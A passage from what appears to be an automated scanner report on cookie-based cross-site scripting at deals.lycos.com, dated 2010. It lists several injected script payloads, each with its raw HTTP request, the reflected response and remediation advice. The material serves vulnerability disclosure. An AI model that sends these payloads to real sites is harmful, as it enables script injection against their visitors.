HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:19 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:20 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 16965
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/viore-24-1080p-lcd-hdtv-for-199-414568&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1e7f1"><script>alert(1)</script>c910f4ec3ad&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1fc0a"%3balert(1)//0e43978a264 was submitted in the diktfc cookie. This input was echoed as 1fc0a";alert(1)//0e43978a264 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/viore-24-1080p-lcd-hdtv-for-199-414568 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1fc0a"%3balert(1)//0e43978a264; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:20 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:21 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 16946
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f05d3"><script>alert(1)</script>ce60a599871 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af05d3"><script>alert(1)</script>ce60a599871; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:37 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:38 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 46445
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af05d3"><script>alert(1)</script>ce60a599871&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1982"%3balert(1)//13da987201f was submitted in the diktfc cookie. This input was echoed as e1982";alert(1)//13da987201f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ae1982"%3balert(1)//13da987201f; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:39 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:39 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 46478
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25659"><script>alert(1)</script>669e5c4d6cc was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/category/automotive-238 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A25659"><script>alert(1)</script>669e5c4d6cc; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:29:57 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:57 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 43807
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/category/automotive-238&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A25659"><script>alert(1)</script>669e5c4d6cc&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b2d5"%3balert(1)//27c5d3438ff was submitted in the diktfc cookie. This input was echoed as 5b2d5";alert(1)//27c5d3438ff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/category/automotive-238 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5b2d5"%3balert(1)//27c5d3438ff; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:29:58 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:59 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 43716
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 930d9"%3balert(1)//408e2508bec was submitted in the diktfc cookie. This input was echoed as 930d9";alert(1)//408e2508bec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/category/babies-and-kids-224 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A930d9"%3balert(1)//408e2508bec; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:29:55 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:56 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 35854
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74795"><script>alert(1)</script>8fa74226461 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/category/babies-and-kids-224 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A74795"><script>alert(1)</script>8fa74226461; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:29:54 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:54 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 35872
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/category/babies-and-kids-224&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A74795"><script>alert(1)</script>8fa74226461&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8b3d"%3balert(1)//270e9be217c was submitted in the diktfc cookie. This input was echoed as e8b3d";alert(1)//270e9be217c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/category/cameras-167 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ae8b3d"%3balert(1)//270e9be217c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:30:54 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:54 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 47423
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8de9"><script>alert(1)</script>ca62e0e2bb6 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/category/cameras-167 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab8de9"><script>alert(1)</script>ca62e0e2bb6; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:30:52 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:52 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 47449
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/category/cameras-167&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab8de9"><script>alert(1)</script>ca62e0e2bb6&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b2e8"%3balert(1)//ec00ddd9290 was submitted in the diktfc cookie. This input was echoed as 2b2e8";alert(1)//ec00ddd9290 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/category/cell-phones-174 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2b2e8"%3balert(1)//ec00ddd9290; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:29:55 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:56 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 42236
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfd7d"><script>alert(1)</script>0b7224d164c was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/category/cell-phones-174 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Abfd7d"><script>alert(1)</script>0b7224d164c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:29:54 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:54 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 42239
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/category/cell-phones-174&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Abfd7d"><script>alert(1)</script>0b7224d164c&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52676"><script>alert(1)</script>35e6603099d was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/category/clothing-and-accessories-202 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A52676"><script>alert(1)</script>35e6603099d; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:29:56 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:56 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 47653
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/category/clothing-and-accessories-202&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A52676"><script>alert(1)</script>35e6603099d&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3b23"%3balert(1)//cf9f07eb831 was submitted in the diktfc cookie. This input was echoed as b3b23";alert(1)//cf9f07eb831 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/category/clothing-and-accessories-202 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab3b23"%3balert(1)//cf9f07eb831; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:29:58 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:58 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 47618
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 409c8"%3balert(1)//11fafd7bd7d was submitted in the diktfc cookie. This input was echoed as 409c8";alert(1)//11fafd7bd7d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/category/computer-39 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A409c8"%3balert(1)//11fafd7bd7d; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
